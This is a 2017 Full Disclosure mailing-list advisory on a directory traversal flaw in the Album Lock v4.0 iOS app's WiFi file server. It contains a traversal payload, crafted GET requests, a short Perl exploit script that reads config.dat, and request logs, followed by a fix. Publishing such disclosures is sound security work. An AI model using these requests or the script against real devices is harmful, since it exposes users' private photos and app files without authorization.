[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Album Lock v4.0 iOS - Directory Traversal Vulnerability
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2017-02-20 10:17:38
Message-ID: 49fd9bce-98c3-461b-264a-887caf6bdd96 () vulnerability-lab ! com
[Download RAW message or body]

Document Title:
===============
Album Lock v4.0 iOS - Directory Traversal Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2033


Release Date:
=============
2017-02-20


Vulnerability Laboratory ID (VL-ID):
====================================
2033


Common Vulnerability Scoring System:
====================================
7.2


Product & Service Introduction:
===============================
Do you have any secret photo and videos in your iPhone? Album Lock can protect your privacy \
perfectly. Album is the most  convenient private Photo&Video App!  You can add your SPECIAL \
photos&videos into AlbumLock, we provides many convenient ways.  From Photo App(Camera Roll), \
iTunes File Sharing Sync, WiFi Transfer and in App Camera.

(Copy of the Homepage: https://itunes.apple.com/us/app/album-lock-lock-secret-photo/id851608952 \
)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a directory traversal web \
vulnerability in the official Album Lock v4.0 ios mobile application.


Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A directory traversal web vulnerability has been dsicovered in the official Album Lock v4.0 iOS \
mobile web-application. The issue allows an attackers to unauthorized request and download \
local application files by manipulation of path parameters.

The directory traversal web vulnerability is located in the `filePaht` parameter of the wifi \
web-server interface. Remote attackers  are able to request the local web-server during the \
sharing process to access unauthenticated application files. Attackers are able  to request via \
`getObject` image path variables to access or download files. Remote attackers are able to \
access the root `document`  path of the application. The request method to execute is GET and \
the attack vector is located on the client-side of the web-server  web-application. Finally an \
attacker is able to access with the credentials the service by using a client via http \
protocol.

The security risk of the directory traversal vulnerability is estimated as high with a cvss \
(common vulnerability scoring system) count of 7.2.  Exploitation of the web vulnerability \
requires no privilege web-application user account or user interaction. Successful exploitation \
of the  vulnerability results in information leaking, mobile application compromise by \
unauthorized and unauthenticated access.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] getObject

Vulnerable Parameter(s):
[+] filePaht

Affected Module(s):
[+] Web-Server File System


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without user interaction or \
privilege web-application user account. For security demonstration or to reproduce the \
vulnerability follow the provided information and steps below to continue.


Standard Request:
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png



PoC: Payload
/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application



Malicious Request: Exploitation
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/
 http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/
http://localhost:8880/getImage?filePaht=/var/mobile/


PoC: Exploit
use strict;
use LWP::UserAgent;
my $b = LWP::UserAgent->new();
my $host = "1.1.1.1:5555";
print $b->get("http://".$host."/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat")->content;



--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application \
 Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8880]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Referer[http://localhost:8880/list_gif.html?folder=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/]
  Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]


Reference(s):
http://localhost:8880/
http://localhost:8880/getImage
http://localhost:8880/getImage?filePaht=
http://localhost:8880/list_gif.html
http://localhost:8880/list_gif.html?folder=


Solution - Fix & Patch:
=======================
The vulnerability can be patch by disallowing the filepaht parameter to request upper local \
paths outside the document folder. Include a whitelist of allowed requested path and setup a \
secure exception to prevent on exploitation.


Security Risk:
==============
The security risk of the directory traversal web vulnerability in the mobile application is \
estimated as high. (CVSS 7.2)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri \
(http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed  or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable  in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab  or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability mainly for  consequential or incidental damages so the \
foregoing limitation may not apply. We do not approve or encourage anybody to break any \
licenses, policies,  deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- \
                evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- \
                youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- \
                vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- \
vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or \
information requires authorization from Vulnerability Laboratory.  Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, including the use \
of other media, are reserved by  Vulnerability-Lab Research Team or its suppliers. All \
pictures, texts, advisories, source code, videos and other information on this website is \
trademark  of vulnerability-lab team & the specific authors or managers. To record, list, \
modify, use or edit our material contact (admin@) to get a ask permission.

				    Copyright  © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic